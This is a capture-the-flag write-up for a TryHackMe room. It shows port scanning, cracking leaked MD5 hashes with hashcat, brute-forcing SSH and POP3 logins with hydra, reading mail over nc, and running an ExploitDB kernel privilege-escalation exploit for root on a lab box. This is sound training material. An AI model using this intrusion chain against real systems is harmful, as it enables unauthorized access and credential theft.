This room is available on TryHackMe at https://tryhackme.com/room/ctf
Reconnaissance
First thing to do, is always do a port scan of all 65535 ports of the server to see what is running on the server.
sudo nmap -sS -p- -T4 x.x.x.x -vv
- -sS for Syn/Stealth scan
- -p- to scan all 65535 ports
- -T4 for a fast aggressive and noisy scan
- -vv for very verbose so we can follow the progress of the scan
Which give us the following
- PORT STATE SERVICE REASON
- 22/tcp open ssh syn-ack ttl 63
- 80/tcp open http syn-ack ttl 63
- 110/tcp open pop3 syn-ack ttl 63
- 143/tcp open imap syn-ack ttl 63
Now lets find out a little more about those specific ports.
sudo nmap -sS -sV -p22,80,110,143 -T4 x.x.x.x -vv
- -sS for Syn/Stealth scan
- -sV to get the version of the software running on the ports
- -p22,80,110,143 to only scan the ports we previously found
- -T4 for a fast aggressive and noisy scan
- -vv for very verbose so we can follow the progress of the scan
Which gives us the following:
- PORT STATE SERVICE REASON VERSION
- 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
- 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
- 110/tcp open pop3 syn-ack ttl 63 Dovecot pop3d
- 143/tcp open imap syn-ack ttl 63 Dovecot imapd
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So we know its running a webserver, lets see what the website looks like when we visit http://x.x.x.x

Well, that’s not a good sign, but let see what else we can find
dirb http://10.10.128.30 /usr/share/dirb/wordlists/common.txt
- —- Scanning URL: http://x.x.x.x/ —-
- ==> DIRECTORY: http://x.x.x.x/assets/
- ==> DIRECTORY: http://x.x.x.x/images/
- + http://x.x.x.x/index.html (CODE:200|SIZE:2629)
- + http://x.x.x.x/robots.txt (CODE:200|SIZE:26)
- + http://x.x.x.x/server-status (CODE:403|SIZE:300)
- —- Entering directory: http://x.x.x.x/assets/ —-
- (!) WARNING: Directory IS LISTABLE. No need to scan it.
- (Use mode ‘-w’ if you want to scan it anyway)
- —- Entering directory: http://x.x.x.x/images/ —-
- (!) WARNING: Directory IS LISTABLE. No need to scan it.
- (Use mode ‘-w’ if you want to scan it anyway)
The only possibly interesting find is the robots.txt, and visiting http://x.x.x.x/robots.txt doesn’t give us anything. So back to the website and it says that the https://twitter.com/fowsniffcorp?lang=en Twitter handle has been hijacked and they may release sensitive information so lets see if they did

And it looks like they have released all the passwords on Pastebin – available at https://pastebin.com/NrAqVeeX

Password Cracking
Save the contents to a text file somewhere, then remove the @fowsniff from the file using sed, grep, excel, or manually using text editor of your choice.
The paste mentions that the passwords are only hashed with the MD5 method (Have a look at https://en.wikipedia.org/wiki/MD5 for more information). So we can use hashcat to hopefully recover some passwords.
hashcat -m 0 fowsniff.txt /usr/share/wordlists/rockyou.txt
- -m 0 tells Hashcat to use MD5
- fowstiff.txt is where I saved the hashes
- /usr/share/wordlists/rockyou.txt is a favorite possible password list
And a few minutes later, we should have 8 of the 9 passwords. Looks like they don’t take password security very seriously.
Remote Attacks
We know that the server runs SSH, so lets see if any of the passwords we cracked work. Hydra is the perfect tool for this.
hydra -L fowsniff-users.txt -P fowsniff-pass.txt x.x.x.x ssh
-
-L fowsniff-users.txt is a list of users from the hash file to try
-
-P fowshiff-pass.txt is a list of passwords we got from the hashfile to try
-
ssh tells hydra to try login with ssh
-
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-26 08:44:24
-
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce
-
the tasks: use -t 4
-
[DATA] max 16 tasks per 1 server, overall 16 tasks, 72 login tries (l:9/p:8), ~5 tries per task
-
[DATA] attacking ssh://10.10.19.176:22/
-
1 of 1 target completed, 0 valid password found
-
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-26 08:44:46
And none of the passwords work for SSH
But we know their are open ports for POP3, so lets see if we can login there and if we can, if there is any useful information in an email. So back to hydra.
hydra -L fowsniff-users.txt -P fowsniff-pass.txt x.x.x.x pop3
And we have a winner, user seina hasn’t changed their password.
Email Info Extraction
We can login to the POP3 server with the login and password using telnet or nc. nc is a better choice as telnet isn’t installed by default.
ElectricToolBox has a list of useful command to run from the console to list and read emails on a POP3 server – https://electrictoolbox.com/pop3-commands/
nc x.x.x.x 110
And what we find is interesting
Exploitation
Let’s login to the server with those details
ssh user@x.x.x.x
And we are in.
sudo -l
sudo doesn’t give us anything to run with root privilege’s, so lets learn a little bit more about the server
uname -a
And we see that this is an old version of Ubuntu. Let’s see if ExploitDB has anything we can use
searchploit linux kernel 4.4.0

The Local Privileges Escalation looks like it might work.
Let’s copy the .c file to our home directory
cp /usr/share/exploitdb/exploits/linux/local/44298.c /home/kali
and now lets compile it
gcc 44298.c
Which now gives us a file named a.out – Now lets transfer it to the victim machine. You can use nc to do this, but I am lazy and use filezilla (sudo apt-get install filezilla if its not installed).
After that, run the command
./a.out
And it will drop you into a rootshell. You can test this by running the command
whoami
Then quickly change directory to /root/ and find the file flag.txt

And you are done. Congratulations on getting the root flag.